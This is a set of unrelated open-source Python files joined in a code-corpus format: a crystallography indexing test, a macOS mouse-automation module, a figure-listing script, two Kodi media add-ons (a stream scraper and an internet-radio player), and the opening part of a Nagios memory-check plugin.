hold = np.dot( ubi, gve )
drlvold = abs(hold - np.round(hold)).sum()
hnew = np.dot( ufit, gve )
drlvnew = abs(hnew - np.round(hnew)).sum()
self.assertTrue( drlvold > 0 )
self.assertAlmostEqual( drlvnew, 0 )
def test_hexagonal(self):
a,c = self.a, self.c
cell = unitcell( [ a*1.05, a*1.05, c*0.95, 90., 90.,120.], "P" )
ub = np.dot( self.U, cell.B )
h1 = (1,0,0)
h2 = (0,0,1)
g1 = np.dot( ub, h1 ) # a calc, wrong
g2 = np.dot( ub, h2 ) # c
ideal = unitcell( [ a, a, c, 90., 90.,120.], "P" )
ideal.makerings(0.3)
ideal.orient( 0, g1, 1, g2 )
gve = np.vstack( (g1 , g2) ).T
for ubi in ideal.UBIlist:
ufit = ubi_fit_2pks( ubi, g1, g2 )
hold = np.dot( ubi, gve )
drlvold = abs(hold - np.round(hold)).sum()
hnew = np.dot( ufit, gve )
drlvnew = abs(hnew - np.round(hnew)).sum()
self.assertTrue( drlvold > 0 )
self.assertAlmostEqual( drlvnew, 0 )
if __name__=="__main__":
unittest.main()
|
jonwright/ImageD11
|
test/test_indexing.py
|
Python
|
gpl-2.0
| 2,698
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
# This file is part of ATOMac.
#@author: Nagappan Alagappan <nagappan@gmail.com>
#@copyright: Copyright (c) 2009-14 Nagappan Alagappan
#@author: Sigbjørn Vik <sigbjorn@opera.com>
#@Copyright (C) 2013-14 Opera Software ASA (generatemouseevent API).
#http://ldtp.freedesktop.org
# ATOMac is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by the Free
# Software Foundation version 2 and no later version.
# ATOMac is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License version 2
# for more details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin
# St, Fifth Floor, Boston, MA 02110-1301 USA.
"""Mouse class."""
import time
from Quartz import CGEventCreateMouseEvent,\
CGEventPost,\
kCGHIDEventTap,\
CGEventSetIntegerValueField,\
kCGMouseEventClickState,\
CGEventGetLocation,\
CGEventCreate
from Quartz import kCGEventMouseMoved as move
from Quartz import kCGEventLeftMouseDown as press_left
from Quartz import kCGEventLeftMouseUp as release_left
from Quartz import kCGEventLeftMouseDragged as drag_left
from Quartz import kCGEventRightMouseDown as press_right
from Quartz import kCGEventRightMouseUp as release_right
from Quartz import kCGEventRightMouseDragged as drag_right
from Quartz import kCGEventOtherMouseDown as press_other
from Quartz import kCGEventOtherMouseUp as release_other
from Quartz import kCGEventOtherMouseDragged as drag_other
from Quartz import kCGMouseButtonLeft as left
from Quartz import kCGMouseButtonRight as right
from Quartz import kCGMouseButtonCenter as centre
from utils import Utils
from server_exception import LdtpServerException
single_click = 1
double_click = 2
triple_click = 3
drag_default_button = 100
# Global value to remember if any button should be down during moves
drag_button_remembered = None
mouse_click_override = {'single_click': single_click, 'double_click': double_click,
'triple_click': triple_click, 'move': move,
'press_left': press_left, 'release_left': release_left,
'drag_left': drag_left, 'press_right': press_right,
'release_right': release_right, 'drag_right': drag_right,
'press_other': press_other, 'release_other': release_other,
'drag_other': drag_other, 'left': left, 'right': right,
'centre': centre, 'drag_default_button': drag_default_button}
class Mouse(Utils):
def mouseleftclick(self, window_name, object_name):
"""
Mouse left click on an object.
@param window_name: Window name to look for, either full name,
LDTP's name convention, or a Unix glob.
@type window_name: string
@param object_name: Object name to look for, either full name,
LDTP's name convention, or a Unix glob. Or menu heirarchy
@type object_name: string
@return: 1 on success.
@rtype: integer
"""
object_handle = self._get_object_handle(window_name, object_name)
if not object_handle.AXEnabled:
raise LdtpServerException(u"Object %s state disabled" % object_name)
self._grabfocus(object_handle)
x, y, width, height = self._getobjectsize(object_handle)
# Mouse left click on the object
object_handle.clickMouseButtonLeft((x + width / 2, y + height / 2))
return 1
def mouserightclick(self, window_name, object_name):
"""
Mouse right click on an object.
@param window_name: Window name to look for, either full name,
LDTP's name convention, or a Unix glob.
@type window_name: string
@param object_name: Object name to look for, either full name,
LDTP's name convention, or a Unix glob. Or menu heirarchy
@type object_name: string
@return: 1 on success.
@rtype: integer
"""
object_handle = self._get_object_handle(window_name, object_name)
if not object_handle.AXEnabled:
raise LdtpServerException(u"Object %s state disabled" % object_name)
self._grabfocus(object_handle)
x, y, width, height = self._getobjectsize(object_handle)
# Mouse right click on the object
object_handle.clickMouseButtonRight((x + width / 2, y + height / 2))
return 1
def generatemouseevent(self, x, y, eventType="b1c",
drag_button_override='drag_default_button'):
"""
Generate mouse event on x, y co-ordinates.
@param x: X co-ordinate
@type x: int
@param y: Y co-ordinate
@type y: int
@param eventType: Mouse click type
@type eventType: str
@param drag_button_override: Any drag_xxx value
Only relevant for movements, i.e. |type| = "abs" or "rel"
Quartz is not fully compatible with windows, so for drags
the drag button must be explicitly defined. generatemouseevent
will remember the last button pressed by default, and drag
that button, use this argument to override that.
@type drag_button_override: str
@return: 1 on success.
@rtype: integer
"""
if drag_button_override not in mouse_click_override:
raise ValueError('Unsupported drag_button_override type: %s' % \
drag_button_override)
global drag_button_remembered
point = (x, y)
button = centre # Only matters for "other" buttons
click_type = None
if eventType == "abs" or eventType == "rel":
if drag_button_override is not 'drag_default_button':
events = [mouse_click_override[drag_button_override]]
elif drag_button_remembered:
events = [drag_button_remembered]
else:
events = [move]
if eventType == "rel":
point = CGEventGetLocation(CGEventCreate(None))
point.x += x
point.y += y
elif eventType == "b1p":
events = [press_left]
drag_button_remembered = drag_left
elif eventType == "b1r":
events = [release_left]
drag_button_remembered = None
elif eventType == "b1c":
events = [press_left, release_left]
elif eventType == "b1d":
events = [press_left, release_left]
click_type = double_click
elif eventType == "b2p":
events = [press_other]
drag_button_remembered = drag_other
elif eventType == "b2r":
events = [release_other]
drag_button_remembered = None
elif eventType == "b2c":
events = [press_other, release_other]
elif eventType == "b2d":
events = [press_other, release_other]
click_type = double_click
elif eventType == "b3p":
events = [press_right]
drag_button_remembered = drag_right
elif eventType == "b3r":
events = [release_right]
drag_button_remembered = None
elif eventType == "b3c":
events = [press_right, release_right]
elif eventType == "b3d":
events = [press_right, release_right]
click_type = double_click
else:
raise LdtpServerException(u"Mouse event '%s' not implemented" % eventType)
for event in events:
CG_event = CGEventCreateMouseEvent(None, event, point, button)
if click_type:
CGEventSetIntegerValueField(
CG_event, kCGMouseEventClickState, click_type)
CGEventPost(kCGHIDEventTap, CG_event)
# Give the event time to happen
time.sleep(0.01)
return 1
def mousemove(self, window_name, object_name):
"""
Mouse move on an object.
@param window_name: Window name to look for, either full name,
LDTP's name convention, or a Unix glob.
@type window_name: string
@param object_name: Object name to look for, either full name,
LDTP's name convention, or a Unix glob. Or menu heirarchy
@type object_name: string
@return: 1 on success.
@rtype: integer
"""
raise LdtpServerException("Not implemented")
def doubleclick(self, window_name, object_name):
"""
Double click on the object
@param window_name: Window name to look for, either full name,
LDTP's name convention, or a Unix glob.
@type window_name: string
@param object_name: Object name to look for, either full name,
LDTP's name convention, or a Unix glob. Or menu heirarchy
@type object_name: string
@return: 1 on success.
@rtype: integer
"""
object_handle = self._get_object_handle(window_name, object_name)
if not object_handle.AXEnabled:
raise LdtpServerException(u"Object %s state disabled" % object_name)
self._grabfocus(object_handle)
x, y, width, height = self._getobjectsize(object_handle)
window=self._get_front_most_window()
# Mouse double click on the object
#object_handle.doubleClick()
window.doubleClickMouse((x + width / 2, y + height / 2))
return 1
def simulatemousemove(self, source_x, source_y, dest_x, dest_y, delay = 0.0):
"""
@param source_x: Source X
@type source_x: integer
@param source_y: Source Y
@type source_y: integer
@param dest_x: Dest X
@type dest_x: integer
@param dest_y: Dest Y
@type dest_y: integer
@param delay: Sleep time between the mouse move
@type delay: double
@return: 1 if simulation was successful, 0 if not.
@rtype: integer
"""
raise LdtpServerException("Not implemented")
|
pyatom/pyatom
|
atomac/ldtpd/mouse.py
|
Python
|
gpl-2.0
| 10,473
|
#!/usr/bin/python2
import glob
names = glob.glob("figs/mc/vertices/*--1.dat")
bases = [name[:-6] for name in names]
info = []
for base in bases:
frames = 0
for i in glob.glob(base+"*"):
if len(i.split('-')) == 6: #number is positive
frames += 1
name = base.split('-')
celltype = name[0].split('/')[-1]
ff = name[1]
polyhedron = name[3]
N = name[4]
info.append(dict(celltype=celltype, name=polyhedron, ff=ff, N=N, frames=frames))
info.sort(key=lambda x: (x['name'], x['celltype'], x['ff'], x['N'], x['frames']))
namelen = max([len(item['name']) for item in info])
cellen = max([len(item['celltype']) for item in info])
Nlen = max([len(item['N']) for item in info])
fflen = max([len(item['ff']) for item in info])
print("Setup frame only:")
print(("%*s %*s %*s %*s" %(namelen, "Name", cellen, "celltype", fflen, "ff", Nlen, "N")))
print("-------------------------------------------------")
for f in info:
if f['frames'] == 0:
print(("%*s %*s %*s %*s" %(namelen, f['name'], cellen, f['celltype'], fflen, f['ff'], Nlen, f['N'])))
print("\nAnimations:")
print(("%*s %*s %*s %*s %s" %(namelen, "Name", cellen, "celltype", fflen, "ff", Nlen, "N", "frames")))
print("-----------------------------------------------------------")
for f in info:
if f['frames'] > 0:
print(("%*s %*s %*s %*s %6s" %(namelen, f['name'], cellen, f['celltype'], fflen, f['ff'], Nlen, f['N'], f['frames'])))
|
droundy/deft
|
papers/polyhedra/figs/list-frames.py
|
Python
|
gpl-2.0
| 1,462
|
# -*- coding: UTF-8 -*-
import json
import re
import urllib
import urlparse
import base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import directstream
from resources.lib.modules import dom_parser
from resources.lib.modules import source_utils
class source:
def __init__(self):
self.priority = 1
self.language = ['de']
self.domains = ['tata.to']
self.base_link = 'http://tata.to'
self.search_link = '/filme?suche=%s&type=alle'
self.ajax_link = '/ajax/stream/%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search_movie(imdb, year)
return url if url else None
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'localtvshowtitle': localtvshowtitle, 'aliases': aliases, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
tvshowtitle = data['tvshowtitle']
localtvshowtitle = data['localtvshowtitle']
aliases = source_utils.aliases_to_array(eval(data['aliases']))
year = re.findall('(\d{4})', premiered)
year = year[0] if year else data['year']
url = self.__search([localtvshowtitle] + aliases, year, season, episode)
if not url and tvshowtitle != localtvshowtitle:
url = self.__search([tvshowtitle] + aliases, year, season, episode)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
ref = urlparse.urljoin(self.base_link, url)
url = urlparse.urljoin(self.base_link, self.ajax_link % re.findall('-(\w+)$', ref)[0])
headers = {'Referer': ref, 'User-Agent': client.randomagent()}
result = client.request(url, headers=headers, post='')
result = base64.decodestring(result)
result = json.loads(result).get('playinfo', [])
if isinstance(result, basestring):
result = result.replace('embed.html', 'index.m3u8')
base_url = re.sub('index\.m3u8\?token=[\w\-]+[^/$]*', '', result)
r = client.request(result, headers=headers)
r = [(i[0], i[1]) for i in re.findall('#EXT-X-STREAM-INF:.*?RESOLUTION=\d+x(\d+)[^\n]+\n([^\n]+)', r, re.DOTALL) if i]
r = [(source_utils.label_to_quality(i[0]), i[1] + source_utils.append_headers(headers)) for i in r]
r = [{'quality': i[0], 'url': base_url+i[1]} for i in r]
for i in r: sources.append({'source': 'CDN', 'quality': i['quality'], 'language': 'de', 'url': i['url'], 'direct': True, 'debridonly': False})
elif result:
result = [i.get('link_mp4') for i in result]
result = [i for i in result if i]
for i in result:
try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'de', 'url': i, 'direct': True, 'debridonly': False})
except: pass
return sources
except:
return
def resolve(self, url):
return url
def __search_movie(self, imdb, year):
try:
query = urlparse.urljoin(self.base_link, self.search_link % imdb)
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})
r = [(dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href'), dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})) for i in r]
r = [(i[0][0].attrs['href'], re.findall('calendar.+?>.+?(\d{4})', ''.join([x.content for x in i[1]]))) for i in r if i[0] and i[1]]
r = [(i[0], i[1][0] if len(i[1]) > 0 else '0') for i in r]
r = sorted(r, key=lambda i: int(i[1]), reverse=True) # with year > no year
r = [i[0] for i in r if i[1] in y][0]
return source_utils.strip_domain(r)
except:
return
def __search(self, titles, year, season=0, episode=False):
try:
query = self.search_link % (urllib.quote_plus(cleantitle.query(titles[0])))
query = urlparse.urljoin(self.base_link, query)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})
f = []
for i in r:
_url = dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href')[0].attrs['href']
_title = re.sub('<.+?>|</.+?>', '', dom_parser.parse_dom(i, 'h6')[0].content).strip()
try: _title = re.search('(.*?)\s(?:staf+el|s)\s*(\d+)', _title, re.I).group(1)
except: pass
_season = '0'
_year = re.findall('calendar.+?>.+?(\d{4})', ''.join([x.content for x in dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})]))
_year = _year[0] if len(_year) > 0 else '0'
if season > 0:
s = dom_parser.parse_dom(i, 'span', attrs={'class': 'season-label'})
s = dom_parser.parse_dom(s, 'span', attrs={'class': 'el-num'})
if s: _season = s[0].content.strip()
if cleantitle.get(_title) in t and _year in y and int(_season) == int(season):
f.append((_url, _year))
r = f
r = sorted(r, key=lambda i: int(i[1]), reverse=True) # with year > no year
r = [i[0] for i in r if r[0]][0]
url = source_utils.strip_domain(r)
if episode:
r = client.request(urlparse.urljoin(self.base_link, url))
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'season-list'})
r = dom_parser.parse_dom(r, 'li')
r = dom_parser.parse_dom(r, 'a', req='href')
r = [(i.attrs['href'], i.content) for i in r]
r = [i[0] for i in r if i[1] and int(i[1]) == int(episode)][0]
url = source_utils.strip_domain(r)
return url
except:
return
|
repotvsupertuga/tvsupertuga.repository
|
script.module.streamtvsupertuga/lib/resources/lib/sources/de/tata.py
|
Python
|
gpl-2.0
| 7,124
|
#
# Copyright (C) 2013- Sean Poyser
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import xbmc
import xbmcaddon
import xbmcplugin
import xbmcgui
import urllib
import urllib2
import re
import datetime
import time
import os
import quicknet
ADDONID = 'plugin.audio.ramfm'
ADDON = xbmcaddon.Addon(ADDONID)
HOME = ADDON.getAddonInfo('path')
TITLE = ADDON.getAddonInfo('name')
VERSION = ADDON.getAddonInfo('version')
PODCASTS = 'http://www.spreaker.com/show/816525/episodes/feed'
ICON = os.path.join(HOME, 'icon.png')
FANART = os.path.join(HOME, 'fanart.jpg')
GETTEXT = ADDON.getLocalizedString
URL = 'http://ramfm.org/ram.pls'
#Pls file
#NumberOfEntries=3
#File1=http://usa3-vn.mixstream.net:8018
#File2=http://uk2-vn.webcast-server.net:8018
#File3=http://uk1-vn.mixstream.net:9866
#Title1=RAM FM Eighties Hit Radio 64kbps AACP
#Title2=RAM FM Eighties Hit Radio 128kbps MP3
#Title3=RAM FM Eighties Hit Radio 192kbps MP3
#Version=2
_PLAYNOW_HI = 192
_PLAYNOW_MED = 128
_PLAYNOW_LO = 64
_REQUEST = 200
_LETTER = 300
_TRACK = 400
_RECORD = 500
_PODCASTS = 700
_PLAYPODCAST = 800
MODE_FREE = 1000
MODE_SONG = 1100
MODE_ARTIST = 1200
MODE_IGNORE = 1300
def DialogOK(title, line1, line2, line3):
xbmcgui.Dialog().ok(title, line1, line2, line3)
def CheckVersion():
prev = ADDON.getSetting('VERSION')
curr = VERSION
if prev == curr:
return
ADDON.setSetting('VERSION', curr)
#if prev == '0.0.0':
DialogOK(TITLE + ' - ' + VERSION, GETTEXT(30017), GETTEXT(30018) , GETTEXT(30019)+' :-)')
def DownloaderClass(url, dest, dp):
dp.update(0, GETTEXT(30020), dest, GETTEXT(30021))
urllib.urlretrieve(url, dest, lambda nb, bs, fs: _pbhook(nb, bs, fs, dp))
def _pbhook(numblocks, blocksize, filesize, dp,):
try:
percent = (numblocks * 5) % 100
dp.update(percent)
#dp.update(0)
except:
pass
if dp.iscanceled():
raise Exception('Canceled')
def GetRecordPath():
downloadFolder = ADDON.getSetting('RECORD_FOLDER')
if ADDON.getSetting('ASK_FOLDER') == 'true':
dialog = xbmcgui.Dialog()
downloadFolder = dialog.browse(3, GETTEXT(30022), 'files', '', False, False, downloadFolder)
if downloadFolder == '' :
return None
if downloadFolder is '':
DialogOK(TITLE, '', GETTEXT(30023), GETTEXT(30024))
ADDON.openSettings()
downloadFolder = ADDON.getSetting('RECORD_FOLDER')
if downloadFolder == '' and ADDON.getSetting('ASK_FOLDER') == 'true':
dialog = xbmcgui.Dialog()
downloadFolder = dialog.browse(3, GETTEXT(30022), GETTEXT(30025), '', False, False, downloadFolder)
if downloadFolder == '' :
return None
if ADDON.getSetting('ASK_FILENAME') == 'true':
kb = xbmc.Keyboard(TITLE, GETTEXT(30026))
kb.doModal()
if kb.isConfirmed():
filename = kb.getText()
else:
return None
else:
filename = TITLE
filename = re.sub('[:\\/*?\<>|"]+', '', filename)
filename = filename + '.mp3'
return os.path.join(downloadFolder, filename)
def Record():
dest = GetRecordPath()
if dest == None or dest == '':
return
dp = xbmcgui.DialogProgress()
dp.create(TITLE)
try:
DownloaderClass(getURL(), dest, dp)
except Exception as e:
if str(e) == 'Canceled':
pass
dp.close()
def Play():
pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
pl.clear()
pl.add(getURL())
xbmc.Player().play(pl)
def PlayPodcast(name, link):
link = link.split('"')[0]
thumbnail = ICON#'DefaultPlaylist.png'
liz = xbmcgui.ListItem(name, iconImage = thumbnail, thumbnailImage = thumbnail)
liz.setInfo('music', {'Title': name})
liz.setProperty('mimetype', 'audio/mpeg')
liz.setProperty('IsPlayable', 'true')
pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
pl.clear()
pl.add(link, liz)
xbmc.Player().play(pl)
def ShowPodcasts():
response = urllib2.urlopen(PODCASTS).read()
response = response.replace('\n','')
match = re.compile('<item><title>(.+?)</title><link>.+?</link>.+?<enclosure url="(.+?)</enclosure>').findall(response)
for name, link in match:
AddPodcast(clean(name), link.split('?')[0])
def AddPodcast(name, link):
thumbnail = ICON#'DefaultPlaylist.png'
u = sys.argv[0]
u += '?url=' + urllib.quote_plus(link)
u += '&mode=' + str(_PLAYPODCAST)
u += '&name=' + urllib.quote_plus(name)
liz = xbmcgui.ListItem(name, iconImage=thumbnail, thumbnailImage=thumbnail)
xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def GetRecent(response):
recent = []
match = re.compile('color="CCDDDD"><b>(.+?)</b>').findall(response)
for artist in match:
recent.append(artist)
return recent
def Request():
addLetter('0-9')
for i in range(65, 91):
addLetter(chr(i))
def IsLive():
try:
#for live show titles see : http://ramfm.org/momentum/cyan/guide.php
title = xbmc.Player().getMusicInfoTag().getTitle().lower()
except:
title = ''
shows = []
shows.append('Eighties Flash Back') #Monday
shows.append('Ladies Night') #Monday - Verified
shows.append('Big Eighties Show') #Tuesday
shows.append('Night Show') #Wednesday / Sunday - Verified
shows.append('Dancing Dave') #Thursday - Verified
shows.append('Eighties Wonderland') #Friday
shows.append('Happy Hour') #Saturday
shows.append('Eighties Request') #Sunday - Verified
shows.append('Chat Request') #
#genre = xbmc.getInfoLabel('MusicPlayer.Genre')
#xbmc.log('Genre = %s' % genre)
for show in shows:
if show.lower() in title:
return True
return False
def IsPlayingRAM():
try:
if not xbmc.Player().isPlayingAudio():
return False
pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)[0]
resp = quicknet.getURL(URL, 1800)
if pl.getfilename()[:-1] in resp:
return True
except:
pass
return False
def Exit():
import sys
sys.exit()
def IsPlaying(message):
if IsPlayingRAM():
return True
dialog = xbmcgui.Dialog()
if dialog.yesno(TITLE, message, GETTEXT(30027), '', GETTEXT(30028), GETTEXT(30029)) == 1:
Exit()
return False
Play()
return xbmc.Player().isPlayingAudio()
def RequestLetter(letter):
if not IsPlaying(GETTEXT(30030)):
return
if letter == '0-9':
url = 'http://ramfm.org/momentum/cyan/playlist0.php'
else:
url = 'http://ramfm.org/momentum/cyan/playlist%s.php' % letter
response = quicknet.getURL(url, 1800)
hide = ADDON.getSetting('HIDE').lower() == 'true'
images = {}
tracks = []
items = response.split('<!-- start')[1:]
for item in items:
item = item.replace(' (& ', ' (& ')
while ' ' in item:
item = item.replace(' ', ' ')
item = item.replace(' ', ' ')
mode = MODE_FREE
if '<i>song recently played</i>' in item:
mode = MODE_IGNORE if hide else MODE_SONG
if '<i>artist recently played</i>' in item:
mode = MODE_IGNORE if hide else MODE_ARTIST
title = None
if mode == MODE_FREE:
match = re.compile('.+?<a href="javascript:request\((.+?)\)" title="(.+?)">.+?<h2>(.+?)</h2>.+?-->').findall(item)[0]
info = match[0]
title = match[1]
artist = match[2].split('-', 1)[0].strip()
image = ''
available = True
if mode == MODE_ARTIST or mode == MODE_SONG:
match = re.compile('.+?title="(.+?)">.+?<p>(.+?)</p></header></a></section><!-- end song recently played / artists recently played -->').findall(item)[0]
info = match[0]
title = match[1].rsplit('(', 1)[0].strip()
artist = match[1].split('-', 1)[0].strip()
image = ''
available = False
if not title:
continue
if image != 'na.gif':
images[artist] = image
tracks.append([artist, title, image, info, available])
titles = ['']
tracks.sort()
for track in tracks:
artist = track[0]
title = track[1]
image = track[2]
info = track[3]
available = track[4]
if title in titles:
continue
titles.append(title)
if image == 'na.gif':
try: image = images[artist]
except: pass
if available:
addAvailable(title, artist, image, info)
else:
addUnavailable(title, artist, image, info)
def clean(name):
name = name.replace('é', 'e')
name = name.replace('&', '&')
return name.strip()
def addAvailable(title, artist, image, request):
#image = 'http://ramfm.org/artistpic/%s' % image.replace(' ', '%20')
image = ICON
name = title
if name.startswith('Request'):
name = name.split('Request', 1)[-1]
name = clean(name)
id = request.split(',')[0]
ip = request.split('\'')[1]
port = request.split('\'')[3]
u = sys.argv[0]
u += '?url=' + urllib.quote_plus('http://www.ramfm.org/req/request.php?songid=%s&samport=%s&samhost=%s' % (id, port, ip))
u += '&mode=' + str(_TRACK)
liz = xbmcgui.ListItem(name, iconImage=image, thumbnailImage=image)
xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def addUnavailable(title, artist, image, reason):
xbmc.log('title %s' % title)
xbmc.log('artist %s' % artist)
xbmc.log('image %s' % image)
xbmc.log('reason %s' % reason)
#image = 'http://ramfm.org/artistpic/%s' % image.replace(' ', '%20')
image = ICON
name = title + '[I] (%s)[/I]' % reason
name = '[COLOR=FFFF0000]' + name + '[/COLOR]'
name = clean(name)
u = sys.argv[0]
u += '?mode=' + str(mode)
liz = xbmcgui.ListItem(name, iconImage=image, thumbnailImage=image)
xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def getURL():
kbps = ADDON.getSetting('STREAM')
if kbps == 'true': # for backward compatible
kbps = '192'
if kbps == 'false': # for backward compatible
kbps = '64'
try:
lines = urllib2.urlopen(URL).readlines()
for line in lines:
try:
items = line.split('=', 1)
attr = items[0].lower()
if attr.startswith('title') and kbps in items[1]:
attr = attr.replace('title', 'file')
for line in lines:
if line.lower().startswith(attr):
return line.split('=', 1)[-1].strip()
except:
pass
except:
pass
return URL
def RequestURL(url):
if not IsPlaying(GETTEXT(30030)):
return
try: response = urllib2.urlopen(url).read()
except: return ShowError(GETTEXT(30050))
failed = 'SongRequester Fail' in response
if failed:
text = re.compile('reason given:<br />(.+?)</font>').findall(response)[0]
if 'please wait about' in response:
try:
wait = re.compile('about (.+?) minutes').findall(response)[0]
text += '[CR]' + GETTEXT(30049) % str(int(wait))
except:
pass
return ShowError(text)
DialogOK(GETTEXT(30031), GETTEXT(30032), GETTEXT(30033), GETTEXT(30031))
def ShowError(text):
DialogOK(GETTEXT(30031), GETTEXT(30034), GETTEXT(30035), text)
def Main():
CheckVersion()
addDir(GETTEXT(30051), _PLAYNOW_HI, False)
addDir(GETTEXT(30052), _PLAYNOW_MED, False)
addDir(GETTEXT(30053), _PLAYNOW_LO, False)
addDir(GETTEXT(30037), _RECORD, False)
addDir(GETTEXT(30031), _REQUEST, True)
addDir(GETTEXT(30040), _PODCASTS, True)
play = ADDON.getSetting('PLAY')=='true'
if play and not xbmc.Player().isPlayingAudio():
Play()
def addLetter(letter):
thumbnail = ICON#'DefaultPlaylist.png'
u = sys.argv[0]
u += '?letter=' + letter
u += '&mode=' + str(_LETTER)
liz = xbmcgui.ListItem(letter, iconImage=thumbnail, thumbnailImage=thumbnail)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=u, listitem=liz, isFolder=True)
def addDir(name, mode, isFolder):
name = clean(name)
thumbnail = ICON
u = sys.argv[0] + '?mode=' + str(mode)
liz = xbmcgui.ListItem(name, iconImage=thumbnail, thumbnailImage=thumbnail)
liz.setProperty('Fanart_Image', FANART)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=u, listitem=liz, isFolder=isFolder)
def get_params(path):
params = {}
path = path.split('?', 1)[-1]
pairs = path.split('&')
for pair in pairs:
split = pair.split('=')
if len(split) > 1:
params[split[0]] = urllib.unquote_plus(split[1])
return params
params = get_params(sys.argv[2])
mode = None
try: mode = int(params['mode'])
except: pass
if mode == _PLAYNOW_HI or mode == _PLAYNOW_MED or mode == _PLAYNOW_LO:
ADDON.setSetting('STREAM', str(mode))
Play()
elif mode == _RECORD:
Record()
elif mode == _REQUEST:
if IsPlaying(GETTEXT(30030)):
xbmc.sleep(500)
if IsLive():
DialogOK(GETTEXT(30031), GETTEXT(30046), GETTEXT(30047), GETTEXT(30048))
#xbmc.executebuiltin('Container.Update(%s,replace)' % sys.argv[0])
Exit()
else:
Request()
elif mode == _LETTER:
if 'letter' in params:
RequestLetter(params['letter'])
else:
Exit()
elif mode == _TRACK:
RequestURL(params['url'])
elif mode == _PODCASTS:
ShowPodcasts()
elif mode == _PLAYPODCAST:
try:
name = params['name']
url = params['url']
PlayPodcast(name, url)
except:
pass
elif mode == MODE_SONG:
ShowError(GETTEXT(30043))
elif mode == MODE_ARTIST:
ShowError(GETTEXT(30044))
else:
Main()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
|
JamesLinEngineer/RKMC
|
addons/plugin.audio.ramfm/default.py
|
Python
|
gpl-2.0
| 15,285
|
#!/usr/bin/python
# Copyright (C) 2014 Red Hat Inc
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
#
import sys
import argparse
import sadf
from glusternagios import utils
_sadfMemCommand = ["sadf", "-x", "--", "-r"]
def parse_input():
parser = argparse.ArgumentParser()
parser.add_argument("-w", "--warning", action="store",
required=True, type=int,
help="Warning threshold in percentage")
parser.add_argument("-c", "--critical", action="store",
required=True, type=int,
help="Critical threshold in percentage")
sadf.add_common_args(parser)
args = parser.parse_args()
return args
def showMemStat(warning, critical, s):
pl_op = {}
if not s:
pl_op["message"] = ("MEMORY STATUS UNKNOWN")
pl_op['exit_status'] = utils.PluginStatusCode.UNKNOWN
return pl_op
try:
totalMem = utils.convertSize((int(s['memory']['memfree'])
+ int(s['memory']['memused'])),
"KB", "GB")
except (KeyError, ValueError) as e:
pl_op["message"] = "key: %s not found" % str(e)
pl_op["exit_status"] = utils.PluginStatusCode.UNKNOWN
return pl_op
crit_value = (totalMem * critical) / 100
war_value = (totalMem * warning) / 100
if utils.convertSize(int(s['memory']['memused']),
"KB", "GB") >= crit_value:
pl_op["message"] = utils.PluginStatus.CRITICAL
pl_op['exit_status'] = utils.PluginStatusCode.CRITICAL
elif utils.convertSize(int(s['memory']['memused']),
"KB", "GB") >= war_value:
pl_op["message"] = utils.PluginStatus.WARNING
pl_op['exit_status'] = utils.PluginStatusCode.WARNING
else:
pl_op["message"] = utils.PluginStatus.OK
